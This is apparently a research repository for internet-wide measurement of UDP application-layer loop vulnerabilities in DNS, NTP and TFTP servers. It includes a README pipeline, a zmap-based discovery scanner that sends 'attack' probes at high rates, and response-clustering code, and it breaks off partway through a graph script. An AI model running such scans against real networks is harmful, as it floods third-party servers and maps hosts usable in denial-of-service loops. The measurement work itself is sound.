├── README.md ├── cluster_verify.py ├── discovery_probe.py ├── dns_clustering.py ├── draw_directed_graph.py ├── loop_probe.py ├── ntp_clustering.py ├── proto_attack_profiles.py ├── proxy.py ├── sample_loop_probe_payloads.py ├── tftp_clustering.py └── verify ├── README.md └── simple_verify.py /README.md: -------------------------------------------------------------------------------- 1 | #### Setup: 2 | 3 | Postgresql: 4 | 5 | db_name: loop_scan 6 | user_name: scan 7 | 8 | Zmap 9 | 10 | Scapy 2.5.0 11 | 12 | #### STEP 1: Discovery Probe 13 | 1. prepare the scan allowlist (a list of all server IPs running certain protocol). 14 | 15 | The file shall be named as: 16 | 17 | allowlist_.txt 18 | e.g., allowlist_dns.txt 19 | 20 | Example content of the file: 21 | 22 | X.X.X.X/32 23 | X.X.X.X/32 24 | ... 25 | 26 | In case you want to scan a subnet e.g., X.X.X.X/16 or 0.0.0.0/0, remove the following from discovery_probe.py and loop_probe.py 27 | 28 | --max-targets=" + str(num_probes) + " \\\n\ 29 | 30 | 31 | 32 | 2. prepare the blacklist (a list of all server IPs that are not scanned). 33 | 34 | The file shall be named as: 35 | 36 | blacklist.txt 37 | 38 | Example content of the file: 39 | 40 | X.X.X.X/32 41 | 192.168.0.0/16 42 | ... 43 | 44 | 3. prepare the config file for zmap: 45 | 46 | The file is named as: 47 | 48 | box.config 49 | 50 | Example content of the file: 51 | 52 | interface 53 | source-ip 54 | gateway-mac 55 | 56 | 57 | 4. run ```python3 discovery_probe.py ``` (num_ips_to_probe=-1 means all) 58 | 59 | e.g., python3 discovery_probe.py ntp -1 60 | 61 | 5. Upon finishing, a table with all responses collected from server will be created: 62 | 63 | named as : _rsps__probed_ 64 | 65 | e.g., ntp_rsps_10000_probed_1609562355 66 | 67 | -------------- 68 | 69 | The ```discovery_probe.py``` script will use probes prepared in ```proto_attack_profiles.py```. If you want to add more discovery probes, see the comment in ```proto_attack_profiles.py```. 70 | 71 | 72 | #### STEP 2: Response Clustering 73 | 1. run ```python3 dns/ntp/tftp_clustering.py ``` 74 | 75 | : the table containing responses collected from servers during discovery probe (Step 1). 76 | e.g., ntp_rsps_10000_probed_1609562355 77 | 78 | : table used to save the clustering result, i.e., the cluster id of each payload 79 | e.g., ntp_cluster_discovery 80 | 81 | : file used to save the summary of each cluster id. 82 | e.g., ntp_mapping_dict.pkl 83 | 84 | 85 | 86 | #### STEP 3: Loop Probe 87 | 1. run ```python3 sample_loop_probe_payloads.py ``` to sample payloads. 88 | 89 | : target protocol 90 | e.g., DNS 91 | 92 | : the table containing responses collected from servers during discovery probe. 93 | e.g., ntp_rsps_10000_probed_1609562355 94 | 95 | : clustering result table in STEP 2 96 | e.g., ntp_cluster_discovery 97 | 98 | : ignore clusters with under distinct responders. 99 | e.g. 10000 100 | 101 | Upon finishing, a file ```_payload.pkl``` containing saved payloads will be created. 102 | The file contains a dict: 103 | 104 | { 105 | 'cluster_type':[payloads1, payloads2], 106 | 'cluster_type2':[payloads1, payloads2], 107 | ... 108 | } 109 | 110 | To see the detail of sampled payloads, you can use: 111 | 112 | import pickle 113 | import pprint 114 | f = open('_payload.pkl','rb') 115 | d = pickle.load(f) 116 | pprint.pprint(d) 117 | 118 | 119 | 2. run ```python3 loop_probe.py ``` to perform the loop probe. 120 | 121 | e.g., python3 loop_probe.py ntp ntp -1 122 | 123 | The loop probe script use the same configuration files as STEP 1. 124 | 125 | Upon finishing a table containig scanning result as follow would be created: 126 | 127 | _target__pkts_rsps__probed_ 128 | e.g., ntp_target_ntp_pkts_rsps_10000_probed_1609562355 129 | 130 | 131 | The loop_probe.py script is also capable to explore cross-protocol. For example, once you have the ```tftp_payload.pkl``` prepared, you can explore TFTP+DNS loop using: 132 | 133 | python3 loop_probe.py dns tftp -1 134 | This will use sampled tftp payloads to scan DNS resolvers. 135 | 136 | 3. run ```python3 dns/ntp/tftp_clustering.py ``` 137 | 138 | : the table generated in loop probe (Step 3.2). 139 | 140 | : the table to save clustering result. 141 | 142 | : please use the same as the one used in STEP 2, so for known cluster types, you won't get a new cluster id. 143 | 144 | 4. run ```python3 cluster_verify.py ``` to check the clustering effectiveness. 145 | 146 | : the table from Step 3.2 147 | e.g., ntp_target_ntp_pkts_rsps_10000_probed_1609562355 148 | 149 | : the file containing sampled payloads, from Step 3.1 150 | 151 | 152 | #### STEP 4: Loop Graph 153 | 1. run ```python3 draw_directed_graph.py ``` to get the loop graph. 154 | 155 | : the table from Step 3.2 156 | 157 | : the cluster table from Step 3.3 158 | 159 | : the file containing identified cycles and vulnerable hosts. 160 | The file contains a dict, where the key is the identified cycle: 161 | 162 | { 163 | '[cluster1, cluster2, cluster1]':[[IP_list_1],[IP_list_2]], 164 | '[cluster1, cluster1]':[[IP_list_1],[IP_list_2]], 165 | ... 166 | } 167 | 168 | 169 | The script will also show a table which summarizes identified cycles and number of affected IPs using stdout. 170 | 171 | #### STEP 5: Loop Verify: 172 | 1. run ```python3 proxy.py ``` to verify identified loops. 173 | 174 | : the IP used by the proxy verifier 175 | : the table from Step 3.2 176 | : the file containing sampled payload from Step 3.1 177 | : the file containing identified cycles from Step 4 178 | : the proxy server use one port per sampled loop pair, this value definies the first port to be used. 179 | e.g., 10000 180 | : use 53, 123, 69 for DNS, NTP, and TFTP respectively. 181 | 182 | 183 | Upon finishing, the script will creat two files: 184 | 185 | progress.log : summarizies the success rate for each cycle 186 | udp_proxy_result.log : provides more detail regarding how much packets are sent among each sampled pair. 187 | 188 | 189 | -------------------------------------------------------------------------------- /cluster_verify.py: -------------------------------------------------------------------------------- 1 | import psycopg2 2 | import tabulate 3 | import pickle 4 | import sys 5 | 6 | db_name = "loop_scan" 7 | db_conn = psycopg2.connect(database=db_name, user="scan") 8 | db_conn.autocommit = True 9 | cursor = db_conn.cursor() 10 | 11 | if len(sys.argv)!=3: 12 | print('python3 cluster_verify.py ') 13 | exit(-1) 14 | 15 | 16 | 17 | scan_2nd_table_name = sys.argv[1] 18 | select_command = "SELECT ARRAY_LENGTH(ARRAY_AGG(rsp_src_ip),1) AS IP_count, count AS num_of_probes, \ 19 | attack_name FROM (SELECT ARRAY_LENGTH(ARRAY_AGG(DISTINCT index),1) AS count, attack_name, rsp_src_ip FROM %s \ 20 | GROUP BY attack_name,rsp_src_ip) AS temp GROUP BY count,attack_name ORDER BY attack_name,count ASC;" % (scan_2nd_table_name) 21 | 22 | cursor.execute(select_command) 23 | data = cursor.fetchall() 24 | 25 | 26 | id_probe_amount_map = {} 27 | f = open(sys.argv[2],'rb') 28 | payload_dict = pickle.load(f) 29 | f.close() 30 | 31 | for key in payload_dict.keys(): 32 | id_probe_amount_map[key] = len(payload_dict[key]) 33 | 34 | 35 | 36 | table_headers = ['attack_name','reply to 0 probe','1 probe','2 probe','3 probe','4 probe','5 probe','reply all fraction','num of probes'] 37 | readable_table = [] 38 | 39 | 40 | amount_dict ={} 41 | for data_item in data: 42 | attack_name = str(data_item[2]).strip() 43 | if attack_name in amount_dict: 44 | amount_dict[attack_name][str(data_item[1]).strip()] = int(data_item[0]) 45 | else: 46 | amount_dict[attack_name]={} 47 | amount_dict[attack_name][str(data_item[1]).strip()] = int(data_item[0]) 48 | 49 | for attack_name in amount_dict.keys(): 50 | temp_list = [attack_name,'?'] 51 | try: 52 | amount_1 = amount_dict[attack_name][str(1)] 53 | temp_list.append(amount_1) 54 | except: 55 | if id_probe_amount_map[attack_name]>=1: 56 | amount_1 = '0' 57 | else: 58 | amount_1 = '-' 59 | temp_list.append(amount_1) 60 | try: 61 | amount_2 = amount_dict[attack_name][str(2)] 62 | temp_list.append(amount_2) 63 | except: 64 | if id_probe_amount_map[attack_name]>=2: 65 | amount_2 = '0' 66 | else: 67 | amount_2 = '-' 68 | temp_list.append(amount_2) 69 | try: 70 | amount_3 = amount_dict[attack_name][str(3)] 71 | temp_list.append(amount_3) 72 | except: 73 | if id_probe_amount_map[attack_name]>=3: 74 | amount_3 = '0' 75 | else: 76 | amount_3 = '-' 77 | temp_list.append(amount_3) 78 | try: 79 | amount_4 = amount_dict[attack_name][str(4)] 80 | temp_list.append(amount_4) 81 | except: 82 | if id_probe_amount_map[attack_name]>=4: 83 | amount_4 = '0' 84 | else: 85 | amount_4 = '-' 86 | temp_list.append(amount_4) 87 | try: 88 | amount_5 = amount_dict[attack_name][str(5)] 89 | temp_list.append(amount_5) 90 | except: 91 | if id_probe_amount_map[attack_name]>=5: 92 | amount_5 = '0' 93 | else: 94 | amount_5 = '-' 95 | temp_list.append(amount_5) 96 | try: 97 | s = 0 98 | s = s + amount_dict[attack_name][str(1)] 99 | s = s + amount_dict[attack_name][str(2)] 100 | s = s + amount_dict[attack_name][str(3)] 101 | s = s + amount_dict[attack_name][str(4)] 102 | s = s + amount_dict[attack_name][str(5)] 103 | except: 104 | pass 105 | 106 | try: 107 | s = round(amount_dict[attack_name][str(id_probe_amount_map[attack_name])]/s*1.0,1) 108 | temp_list.append(s) 109 | except: 110 | temp_list.append('?') 111 | pass 112 | 113 | 114 | temp_list.append(id_probe_amount_map[attack_name]) 115 | readable_table.append(temp_list) 116 | 117 | 118 | print(tabulate.tabulate(readable_table,headers = table_headers)) 119 | -------------------------------------------------------------------------------- /discovery_probe.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import pandas as pd 3 | import proto_attack_profiles 4 | import psycopg2 5 | import random 6 | import string 7 | from subprocess import call 8 | import time 9 | import os 10 | import sys 11 | 12 | DEBUG = True 13 | logging.basicConfig(level=logging.DEBUG, format="[%(asctime)s] %(message)s") 14 | 15 | 16 | db_name = "loop_scan" 17 | db_conn = psycopg2.connect(database=db_name, user="scan") 18 | db_conn.autocommit = True 19 | db_cursor = db_conn.cursor() 20 | 21 | proto = sys.argv[1].lower() 22 | 23 | 24 | proto_profile = proto_attack_profiles.proto_to_profile[proto] 25 | 26 | trunc_timestamp = str(time.time()).rpartition(".")[0] 27 | num_probes = int(sys.argv[2]) 28 | if DEBUG: logging.debug("START: counting lines in allowlist.") 29 | with open(r"allowlist_" + proto + ".txt", 'r') as fp: 30 | num_allowed_ips = len(fp.readlines()) 31 | if (num_probes < 0) or (num_probes > num_allowed_ips): 32 | num_probes = num_allowed_ips 33 | if DEBUG: logging.debug("FINISHED: counting lines in allowlist.\n") 34 | 35 | responses_storage_name = proto + "_rsps_" + str(num_probes) + "_probed_" + trunc_timestamp 36 | 37 | create_new_table_sql = "CREATE TABLE IF NOT EXISTS " + responses_storage_name + "(saddr inet NOT NULL,\ 38 | data text NOT NULL, attack_name text NOT NULL);" 39 | if DEBUG: logging.debug("START: creating sql responses table.") 40 | db_cursor.execute(create_new_table_sql) 41 | if DEBUG: logging.debug("FINISHED: creating sql responses table.\n") 42 | 43 | 44 | num_allowlists = 1 45 | 46 | for i in range(num_allowlists): 47 | 48 | allowlist_path = "allowlist_" + proto + ".txt" 49 | attacks = proto_profile.attack_name_to_pkt 50 | sending_port = 50000 51 | 52 | # the server might deploy source port filtering -> to filter out well-known port number 53 | # if you want to get rid of these cases, use the following code 54 | # proto_to_port = { "dns" : 53, "ntp" : 123, "tftp" : 69 } 55 | # target_port = proto_to_port[proto] 56 | # sending_port = proto_to_port[proto] 57 | 58 | 59 | # one could use the following output filter: 60 | # --output-fields=\"saddr,sport,dport,data\" \\\n\ 61 | # --output-filter=\"sport=" + str(proto_to_port[proto]) + " && dport=" + str(sending_port) + " && success=1 && repeat=0\" \\\n\ 62 | # In case some UDP server (e.g., TFTP server) will use random port to send response. 63 | 64 | 65 | for attack_name in attacks: 66 | if DEBUG: logging.debug("---------- PROBE: " + attack_name + " ----------\n") 67 | sending_port += 1 68 | scan_script_str = "#!/usr/bin/env bash\n\ 69 | WHITELIST=" + allowlist_path + "\n\ 70 | BLACKLIST=blacklist.txt\n\ 71 | box_config=box.config\n\ 72 | responses_dir_path=rsps/" + responses_storage_name + "\n\ 73 | mkdir -p $responses_dir_path\n\ 74 | set -o pipefail &&\n\ 75 | /usr/local/sbin/zmap \\\n\ 76 | --config=$box_config \\\n\ 77 | --target-port=" + str(proto_profile.port) + " \\\n\ 78 | --source-port=" + str(sending_port) + " \\\n\ 79 | --allowlist-file=${WHITELIST} \\\n\ 80 | --blocklist-file=${BLACKLIST} \\\n\ 81 | --rate=100000 \\\n\ 82 | --sender-threads=1 \\\n\ 83 | --max-targets=" + str(num_probes) + " \\\n\ 84 | --cooldown-time=10 \\\n\ 85 | --seed=85 \\\n\ 86 | --probes=1 \\\n\ 87 | --probe-module=udp \\\n\ 88 | --probe-args=" + proto_profile.attack_name_to_format[attack_name] + ":" + proto_profile.attack_name_to_pkt[attack_name] + " \\\n\ 89 | --output-module=csv \\\n\ 90 | --output-fields=\"saddr,data\" \\\n\ 91 | --output-filter=\"\" \\\n\ 92 | --verbosity=0 \\\n\ 93 | --quiet \\\n\ 94 | --disable-syslog \\\n\ 95 | --ignore-blocklist-errors \\\n\ 96 | > ${responses_dir_path}/" + attack_name + "_responses.csv" 97 | 98 | if DEBUG: logging.debug("START: write zmap script to .sh file.") 99 | scan_script_f = open("zmap_scan.sh", "w") 100 | scan_script_f.write(scan_script_str) 101 | scan_script_f.close() 102 | if DEBUG: logging.debug("FINISHED: write zmap script to .sh file.\n") 103 | 104 | 105 | if DEBUG: logging.debug("START: call zmap on a single attack packet.") 106 | call(['/bin/bash', 'zmap_scan.sh']) 107 | if DEBUG: logging.debug("FINISHED: call zmap on a single attack packet.\n") 108 | 109 | time.sleep(5) 110 | 111 | # ---------------------------- SAVE RESPONSES ---------------------------------- 112 | 113 | # Label: each row/response labeled with attack name. 114 | if DEBUG: logging.debug("START: read csv into pandas dataframe.") 115 | csv_path = os.getcwd() + "/rsps/" + responses_storage_name + "/" + attack_name + "_responses.csv" 116 | zmap_df = pd.read_csv(csv_path) 117 | if DEBUG: logging.debug("FINISHED: read csv into pandas dataframe.") 118 | zmap_df['attack_name'] = attack_name 119 | # zmap_df = zmap_df.drop(['sport','dport'],axis=1) 120 | if DEBUG: logging.debug("FINISHED: add attack column to csv.") 121 | zmap_df.to_csv(csv_path, index=False) 122 | if DEBUG: logging.debug("FINISHED: convert dataframe back to csv.\n") 123 | 124 | # Transfer: ZMap csv output file -> postgresql table 125 | transfer_sql = "COPY " + responses_storage_name + "(saddr, data, attack_name) FROM '" + csv_path + "' DELIMITER ',' CSV HEADER WHERE data IS NOT NULL;" 126 | if DEBUG: logging.debug("START: copy csv to database.") 127 | db_cursor.execute(transfer_sql) 128 | if DEBUG: logging.debug("FINISHED: copy csv to database.\n") 129 | 130 | 131 | 132 | # All ZMap responses were transferred into the postgresql table, so it is now 133 | # safe to rename the columns to more descriptive names. 134 | if DEBUG: logging.debug("START: rename two columns in database.") 135 | rename_col1_sql = "ALTER TABLE " + responses_storage_name + " RENAME saddr TO rsp_src_ip;" 136 | db_cursor.execute(rename_col1_sql) 137 | 138 | rename_col2_sql = "ALTER TABLE " + responses_storage_name + " RENAME data TO rsp_payload;" 139 | db_cursor.execute(rename_col2_sql) 140 | if DEBUG: logging.debug("FINISHED: rename two columns in database.\n") 141 | 142 | 143 | 144 | if DEBUG: logging.debug("START: close database cursor and connection.") 145 | db_cursor.close() 146 | db_conn.close() 147 | if DEBUG: logging.debug("FINISHED: close database cursor and connection.\n") 148 | 149 | print("Probe responses were stored using Postgresql.") 150 | print("\tdatabase name: " + db_name) 151 | print("\ttable name: " + responses_storage_name) -------------------------------------------------------------------------------- /dns_clustering.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | import psycopg2 3 | import pickle 4 | import psycopg2.extras 5 | 6 | # Remind to replace the domain name in line #175 7 | 8 | def DNS_classifier(payload): 9 | try: 10 | dns_pac = DNS(bytes.fromhex(payload)) 11 | status_code = '' 12 | # ------------- QR ----------------- 13 | status_bit = '' 14 | try: 15 | qr = dns_pac.qr 16 | status_bit = hex(qr)[2] 17 | except: 18 | status_bit = '-' 19 | 20 | status_code = status_code + status_bit 21 | 22 | # ------------ OPCODE ------------ 23 | status_bit = '' 24 | try: 25 | opcode = dns_pac.opcode 26 | status_bit = hex(opcode)[2] 27 | except: 28 | status_bit = '-' 29 | status_code = status_code + status_bit 30 | 31 | # ----------- AA ------------ 32 | status_bit = '' 33 | try: 34 | aa = dns_pac.aa 35 | status_bit = hex(aa)[2] 36 | except: 37 | status_bit = '-' 38 | status_code = status_code + status_bit 39 | 40 | # ----------- TC ------------ 41 | status_bit = '' 42 | try: 43 | tc = dns_pac.tc 44 | status_bit = hex(tc)[2] 45 | except: 46 | status_bit = '-' 47 | status_code = status_code + status_bit 48 | 49 | 50 | # ----------- RD ------------ 51 | status_bit = '' 52 | try: 53 | rd = dns_pac.rd 54 | status_bit = hex(rd)[2] 55 | except: 56 | status_bit = '-' 57 | status_code = status_code + status_bit 58 | 59 | # ----------- RA ------------ 60 | status_bit = '' 61 | try: 62 | ra = dns_pac.ra 63 | status_bit = hex(ra)[2] 64 | except: 65 | status_bit = '-' 66 | status_code = status_code + status_bit 67 | 68 | 69 | # ----------- z ------------ 70 | status_bit = '' 71 | try: 72 | z = dns_pac.z 73 | status_bit = hex(z)[2] 74 | except: 75 | status_bit = '-' 76 | status_code = status_code + status_bit 77 | 78 | # ----------- ad ------------ 79 | status_bit = '' 80 | try: 81 | ad = dns_pac.ad 82 | status_bit = hex(ad)[2] 83 | except: 84 | status_bit = '-' 85 | status_code = status_code + status_bit 86 | 87 | # ----------- cd ------------ 88 | status_bit = '' 89 | try: 90 | cd = dns_pac.cd 91 | status_bit = hex(cd)[2] 92 | except: 93 | status_bit = '-' 94 | status_code = status_code + status_bit 95 | 96 | # ----------- rcode ------------ 97 | status_bit = '' 98 | try: 99 | rcode = dns_pac.rcode 100 | status_bit = hex(rcode)[2] 101 | except: 102 | status_bit = '-' 103 | status_code = status_code + status_bit 104 | 105 | # ----------- qdcount --------- 106 | status_bit = '' 107 | try: 108 | qdcount = dns_pac.qdcount 109 | if qdcount <=1: 110 | status_bit = '000'+hex(qdcount)[2] 111 | elif qdcount<=256: 112 | status_bit = '0100' 113 | elif qdcount<=8192: 114 | status_bit = '2000' 115 | elif qdcount<=65536: 116 | status_bit = 'ffff' 117 | except: 118 | status_bit = '----' 119 | status_code = status_code + status_bit 120 | 121 | # ----------- ancount --------- 122 | status_bit = '' 123 | try: 124 | ancount = dns_pac.ancount 125 | if ancount <=1: 126 | status_bit = '000'+hex(ancount)[2] 127 | elif ancount<=256: 128 | status_bit = '0100' 129 | elif ancount<=8192: 130 | status_bit = '2000' 131 | elif ancount<=65536: 132 | status_bit = 'ffff' 133 | except: 134 | status_bit = '----' 135 | status_code = status_code + status_bit 136 | 137 | # ----------- nscount --------- 138 | status_bit = '' 139 | try: 140 | nscount = dns_pac.nscount 141 | if nscount <=1: 142 | status_bit = '000'+hex(nscount)[2] 143 | elif nscount<=256: 144 | status_bit = '0100' 145 | elif nscount<=8192: 146 | status_bit = '2000' 147 | elif nscount<=65536: 148 | status_bit = 'ffff' 149 | except: 150 | status_bit = '----' 151 | status_code = status_code + status_bit 152 | 153 | # ----------- arcount --------- 154 | status_bit = '' 155 | try: 156 | arcount = dns_pac.arcount 157 | if arcount <=1: 158 | status_bit = '000'+hex(arcount)[2] 159 | elif arcount<=256: 160 | status_bit = '0100' 161 | elif arcount<=8192: 162 | status_bit = '2000' 163 | elif arcount<=65536: 164 | status_bit = 'ffff' 165 | except: 166 | status_bit = '----' 167 | status_code = status_code + status_bit 168 | 169 | # ------------ qname------------------ 170 | status_bit='' 171 | try: 172 | qname = dns_pac.qd.qname 173 | if qname==b'.': 174 | status_bit = 'isdot' 175 | elif b'our domain' in qname: 176 | status_bit = 'okdom' 177 | else: 178 | status_bit = 'nodom' 179 | except: 180 | status_bit = '-----' 181 | status_code = status_code + status_bit 182 | 183 | # ---------- QTYPE -------------- 184 | status_bit = '' 185 | try: 186 | qtype = dns_pac.qd.qtype 187 | hex_str = hex(qtype) 188 | hex_str = hex_str[2:len(hex_str)] 189 | for i in range(0,4-len(hex_str)): 190 | hex_str = '0'+hex_str 191 | status_bit = hex_str 192 | except: 193 | status_bit = '----' 194 | status_code = status_code+status_bit 195 | 196 | # ---------- QCLASS -------------- 197 | status_bit = '' 198 | try: 199 | qclass = dns_pac.qd.qclass 200 | hex_str = hex(qclass) 201 | hex_str = hex_str[2:len(hex_str)] 202 | for i in range(0,4-len(hex_str)): 203 | hex_str = '0'+hex_str 204 | status_bit = hex_str 205 | except: 206 | status_bit = '----' 207 | status_code = status_code+status_bit 208 | 209 | 210 | # ---------- atype -------------- 211 | status_bit = '' 212 | try: 213 | atype = dns_pac.an.type 214 | hex_str = hex(atype) 215 | hex_str = hex_str[2:len(hex_str)] 216 | for i in range(0,4-len(hex_str)): 217 | hex_str = '0'+hex_str 218 | status_bit = hex_str 219 | except: 220 | status_bit = '----' 221 | status_code = status_code+status_bit 222 | 223 | # ---------- aclass -------------- 224 | status_bit = '' 225 | try: 226 | aclass = dns_pac.an.rclass 227 | hex_str = hex(aclass) 228 | hex_str = hex_str[2:len(hex_str)] 229 | for i in range(0,4-len(hex_str)): 230 | hex_str = '0'+hex_str 231 | status_bit = hex_str 232 | except: 233 | status_bit = '----' 234 | status_code = status_code+status_bit 235 | 236 | 237 | # # --------- rdlen ------------------- 238 | # status_bit = '' 239 | # try: 240 | # rdlen = dns_pac.an.rdlen 241 | # if rdlen <=32: 242 | # status_bit = '0020' 243 | # # elif arcount<=256: 244 | # # status_bit = '0100' 245 | # # elif arcount<=8192: 246 | # # status_bit = '2000' 247 | # # elif arcount<=65536: 248 | # # status_bit = 'ffff' 249 | # except: 250 | # status_bit = '----' 251 | # status_code = status_code + status_bit 252 | 253 | return status_code 254 | except Exception as e: 255 | status_code = str(e) + '|' 256 | status_bit = '' 257 | 258 | if len(payload)<=2: 259 | status_bit = 'os' 260 | status_code = status_code + status_bit 261 | return status_code 262 | 263 | payload_bits_str = '' 264 | for hex_str in payload: 265 | payload_bits_str = payload_bits_str + bin(int(hex_str,16))[2:].zfill(4) 266 | 267 | payload_bits_str_len = len(payload_bits_str) 268 | 269 | # QR 270 | status_bit = '' 271 | if payload_bits_str_len>=17: 272 | qr = payload_bits_str[16] 273 | status_bit = qr 274 | else: 275 | status_bit = '-' 276 | status_code = status_code + status_bit 277 | return status_code 278 | 279 | status_code = status_code + status_bit 280 | 281 | # OPCODE 282 | status_bit = '' 283 | if payload_bits_str_len>=21: 284 | opcode = payload_bits_str[17:21] 285 | status_bit = hex(int(opcode,2))[2:] 286 | else: 287 | status_bit = '-' 288 | status_code = status_code + status_bit 289 | return status_code 290 | 291 | status_code = status_code + status_bit 292 | 293 | 294 | # AA 295 | status_bit = '' 296 | if payload_bits_str_len>=22: 297 | aa = payload_bits_str[21] 298 | status_bit = aa 299 | else: 300 | status_bit = '-' 301 | status_code = status_code + status_bit 302 | return status_code 303 | 304 | status_code = status_code + status_bit 305 | 306 | # TC 307 | status_bit = '' 308 | if payload_bits_str_len>=23: 309 | tc = payload_bits_str[22] 310 | status_bit = tc 311 | else: 312 | status_bit = '-' 313 | status_code = status_code + status_bit 314 | return status_code 315 | 316 | status_code = status_code + status_bit 317 | 318 | # RD 319 | status_bit = '' 320 | if payload_bits_str_len>=24: 321 | rd = payload_bits_str[23] 322 | status_bit = rd 323 | else: 324 | status_bit = '-' 325 | status_code = status_code + status_bit 326 | return status_code 327 | 328 | status_code = status_code + status_bit 329 | 330 | # RA 331 | status_bit = '' 332 | if payload_bits_str_len>=25: 333 | ra = payload_bits_str[24] 334 | status_bit = ra 335 | else: 336 | status_bit = '-' 337 | status_code = status_code + status_bit 338 | return status_code 339 | 340 | status_code = status_code + status_bit 341 | 342 | 343 | # z 344 | status_bit = '' 345 | if payload_bits_str_len>=26: 346 | z = payload_bits_str[25] 347 | status_bit = z 348 | else: 349 | status_bit = '-' 350 | status_code = status_code + status_bit 351 | return status_code 352 | 353 | status_code = status_code + status_bit 354 | 355 | 356 | # ad 357 | status_bit = '' 358 | if payload_bits_str_len>=27: 359 | ad = payload_bits_str[26] 360 | status_bit = ad 361 | else: 362 | status_bit = '-' 363 | status_code = status_code + status_bit 364 | return status_code 365 | 366 | status_code = status_code + status_bit 367 | 368 | 369 | # cd 370 | status_bit = '' 371 | if payload_bits_str_len>=28: 372 | cd = payload_bits_str[27] 373 | status_bit = cd 374 | else: 375 | status_bit = '-' 376 | status_code = status_code + status_bit 377 | return status_code 378 | 379 | status_code = status_code + status_bit 380 | 381 | 382 | # rcode 383 | status_bit = '' 384 | if payload_bits_str_len>=32: 385 | rcode = payload_bits_str[28:32] 386 | status_bit = hex(int(rcode,2))[2:] 387 | else: 388 | status_bit = '-' 389 | status_code = status_code + status_bit 390 | return status_code 391 | 392 | status_code = status_code + status_bit 393 | 394 | 395 | # qdcount 396 | status_bit = '' 397 | if payload_bits_str_len>=48: 398 | qdcount = payload_bits_str[32:48] 399 | qdcount = int(qdcount,2) 400 | if qdcount <=1: 401 | status_bit = '000'+hex(qdcount)[2] 402 | elif qdcount<=256: 403 | status_bit = '0100' 404 | elif qdcount<=8192: 405 | status_bit = '2000' 406 | elif qdcount<=65536: 407 | status_bit = 'ffff' 408 | else: 409 | status_bit = '----' 410 | status_code = status_code + status_bit 411 | return status_code 412 | 413 | status_code = status_code + status_bit 414 | 415 | # ancount 416 | status_bit = '' 417 | if payload_bits_str_len>=64: 418 | ancount = payload_bits_str[48:64] 419 | ancount = int(ancount,2) 420 | if ancount <=1: 421 | status_bit = '000'+hex(ancount)[2] 422 | elif ancount<=256: 423 | status_bit = '0100' 424 | elif ancount<=8192: 425 | status_bit = '2000' 426 | elif ancount<=65536: 427 | status_bit = 'ffff' 428 | else: 429 | status_bit = '----' 430 | status_code = status_code + status_bit 431 | return status_code 432 | 433 | status_code = status_code + status_bit 434 | 435 | 436 | # nscount 437 | status_bit = '' 438 | if payload_bits_str_len>=80: 439 | nscount = payload_bits_str[64:80] 440 | nscount = int(nscount,2) 441 | if nscount <=1: 442 | status_bit = '000'+hex(nscount)[2] 443 | elif nscount<=256: 444 | status_bit = '0100' 445 | elif nscount<=8192: 446 | status_bit = '2000' 447 | elif nscount<=65536: 448 | status_bit = 'ffff' 449 | else: 450 | status_bit = '----' 451 | status_code = status_code + status_bit 452 | return status_code 453 | 454 | status_code = status_code + status_bit 455 | 456 | 457 | # arcount 458 | status_bit = '' 459 | if payload_bits_str_len>=96: 460 | arcount = payload_bits_str[80:96] 461 | arcount = int(arcount,2) 462 | if arcount <=1: 463 | status_bit = '000'+hex(arcount)[2] 464 | elif arcount<=256: 465 | status_bit = '0100' 466 | elif arcount<=8192: 467 | status_bit = '2000' 468 | elif arcount<=65536: 469 | status_bit = 'ffff' 470 | else: 471 | status_bit = '----' 472 | status_code = status_code + status_bit 473 | return status_code 474 | 475 | status_code = status_code + status_bit 476 | 477 | status_bit = '' 478 | rest_payload_length = len(payload_bits_str)-96 479 | if rest_payload_length==0: 480 | status_bit = '0000' 481 | elif rest_payload_length<=128: 482 | status_bit = '0080' 483 | elif rest_payload_length<=1024: 484 | status_bit = '0400' 485 | else: 486 | status_bit = 'ffff' 487 | status_code = status_code + status_bit 488 | return status_code 489 | 490 | 491 | def do_cluster(raw_data_table_name,output_mapping_table_name,cluster_payload_pattern_mapping): 492 | db_name = "loop_scan" 493 | db_conn = psycopg2.connect(database=db_name, user="scan") 494 | db_conn.autocommit = True 495 | cursor = db_conn.cursor() 496 | 497 | sql_get_length = "SELECT COUNT(*) FROM %s;" % (raw_data_table_name) 498 | cursor.execute(sql_get_length) 499 | max_item_count = cursor.fetchall()[0][0] 500 | 501 | 502 | status_dict = {} 503 | total_cluster = 0 504 | try: 505 | dict_file = open(cluster_payload_pattern_mapping,'rb') 506 | status_dict = pickle.load(dict_file) 507 | total_clusters = len(status_dict) 508 | dict_file.close() 509 | except: 510 | pass 511 | 512 | offset = 0 513 | step_size = 10000 514 | progress_count = 0 515 | 516 | try: 517 | drop_table = "DROP TABLE %s;" % (output_mapping_table_name) 518 | cursor.execute(drop_table) 519 | except: 520 | pass 521 | 522 | create_table = "CREATE TABLE %s (type_id INT,\ 523 | payload TEXT PRIMARY KEY);" % (output_mapping_table_name) 524 | cursor.execute(create_table) 525 | 526 | 527 | insert_command = "INSERT INTO " + output_mapping_table_name + " VALUES %s;" 528 | payload_list = set() 529 | while(True): 530 | if offset > max_item_count: 531 | break 532 | select_command = "select DISTINCT rsp_payload from %s;" % (raw_data_table_name) 533 | cursor.execute(select_command) 534 | all_data = cursor.fetchall() 535 | 536 | 537 | update_list = [] 538 | for data in all_data: 539 | progress_count = progress_count + 1 540 | payload_data = data[0].strip() 541 | total_clusters = len(status_dict.keys()) + 1 542 | status_code = DNS_classifier(payload_data) 543 | if len(payload_data) > 2500: 544 | continue 545 | if not status_code in status_dict: 546 | status_dict[status_code] = total_clusters 547 | 548 | 549 | if not payload_data in payload_list: 550 | update_list.append((status_dict[status_code],payload_data,)) 551 | payload_list.add(payload_data) 552 | 553 | temp = psycopg2.extras.execute_values(cursor,insert_command,update_list) 554 | 555 | 556 | offset = offset + step_size 557 | break 558 | 559 | 560 | with open(cluster_payload_pattern_mapping,'wb') as f: 561 | pickle.dump(status_dict,f) 562 | f.close() 563 | 564 | 565 | 566 | import sys 567 | 568 | if len(sys.argv)!=4: 569 | print('python3 dns_clustering.py ') 570 | exit(-1) 571 | 572 | scan_table_name = sys.argv[1] 573 | cluster_table_name = sys.argv[2] 574 | type_summary_id_mapping_dict = sys.argv[3] 575 | do_cluster(scan_table_name,cluster_table_name,type_summary_id_mapping_dict) 576 | 577 | -------------------------------------------------------------------------------- /draw_directed_graph.py: -------------------------------------------------------------------------------- 1 | import networkx as nx 2 | import psycopg2 3 | import pickle 4 | import math 5 | import tabulate 6 | import sys 